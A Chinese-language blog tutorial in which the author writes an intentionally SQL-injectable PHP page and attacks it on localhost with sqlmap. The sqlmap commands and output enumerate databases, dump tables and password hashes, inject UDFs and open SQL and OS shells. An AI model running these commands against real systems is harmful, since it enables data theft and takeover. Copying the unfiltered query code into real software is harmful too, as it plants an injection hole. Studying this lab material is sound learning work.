利用sqlmap进行sql注入实践

sqlmap是基于python开发的一款开源sql注入利用工具,比较强大。今天我写了一个有sql注入漏洞的页面,然后利用sqlmap来进行注入攻击,以此来研究sql注入原理和sqlmap的使用,同时也意识到了sql注入的危害有多么大。

首先,下面是我写的一个简单含有sql注入漏洞的php代码,从代码里可以看到,我们接收一个gid参数,没有对参数作任何过滤处理,就直接组合成sql语句进行查询,必然存在sql注入了。

<?php
$db = mysql_connect('127.0.0.1','root','123456');
mysql_select_db('auction', $db);
$result = mysql_query("set names 'utf8'");
$goodsid = $_GET['gid'];
$query = "select * from sys_goods where gid<$goodsid";
$result = mysql_query($query);
$row = mysql_fetch_row($result);
$num = mysql_num_rows($result);
for($i=0; $i<$num; $i++){
    $row = mysql_fetch_row($result);
    print_r($row);
}
?>

下面就用sqlmap来一步一步注入。

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –current-user
#获取当前用户名称

current user:    'root@localhost'

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –current-db
#获取当前数据库名称

current database:    'auction'

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –tables -D “auction”
#列表名

Database: auction
[2 tables]
+----------------+
| sys_goods      |
| sys_goods_type |
+----------------+

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –tables -D “auction”
#列字段

Database: auction
Table: sys_goods
[18 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| cby         | int(10)      |
| g_ad        | varchar(128) |
| g_bid_user  | text         |
| g_calc_type | tinyint(4)   |
| g_content   | varchar(120) |
| g_end       | int(10)      |
| g_name      | varchar(200) |
| g_num       | int(10)      |
| g_number    | int(10)      |
| g_photo     | varchar(200) |
| g_price     | float(6,2)   |
| g_start     | int(10)      |
| g_status    | tinyint(4)   |
| g_text      | text         |
| g_type      | int(10)      |
| g_uptime    | int(10)      |
| gid         | int(10)      |
| mx_id       | int(10)      |
+-------------+--------------+

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –dump -C “g_name” -T “sys_goods” -D “auction” -v 0
#获取字段内容

Database: auction
Table: sys_goods
[94 entries]
+-----------------------+
| g_name                |
+-----------------------+
| <blank>               |
| <blank>               |
| <blank>               |
| 020                   |
| 022                   |
| 1                     |
| 1                     |
| 1                     |
| 1.0                   |
| 11                    |
| 12                    |
| 12                    |
| 12                    |
| 12.                   |
....
....

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –users
#列数据库用户

database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.domain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.domain'

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –dbs
#列数据库

available databases [7]:
[*] auction
[*] django1
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] wp_blog

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –passwords
#数据库用户密码

database management system users password hashes:
[*]  [1]:
    password hash: NULL
[*] root [1]:
    password hash: *CF2C295FF917*735835*4920*EB24*ACFBC72E53

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –privileges
#查看权限

[23:10:25] [INFO] fetching privileges for user '%root%'
[23:10:25] [INFO] retrieved: SELECT
[23:10:27] [INFO] retrieved: INSERT
[23:10:30] [INFO] retrieved: UPDATE
[23:10:32] [INFO] retrieved: DELETE
[23:10:34] [INFO] retrieved: CREATE
[23:10:36] [INFO] retrieved: DROP
...
...

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –privileges -U root
#查看指定用户权限

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –is-dba -v 1
#是否是数据库管理员

[23:19:27] [INFO] testing if current user is DBA
[23:19:27] [INFO] fetching current user
[23:19:27] [INFO] resumed: root@localhost
current user is DBA:    True

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –roles
#枚举数据库用户角色

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –udf-inject
#导入用户自定义函数(获取系统权限!)

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –dump-all –exclude-sysdbs -v 0
#列出当前库所有表

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –sql-shell
#执行指定sql命令,会叫你输入sql命令,然后一步一步走就行了

./sqlmap.py -u “http://127.0.0.1/sqlmap.php?gid=100” –leve=3 –smart –dbms “Mysql” –os-shell
#系统交互shell

如果想看看sqlmap到底是如何注入的,可以在注入的时候看apache的访问日志,看sqlmap提交的注入语句就知道了。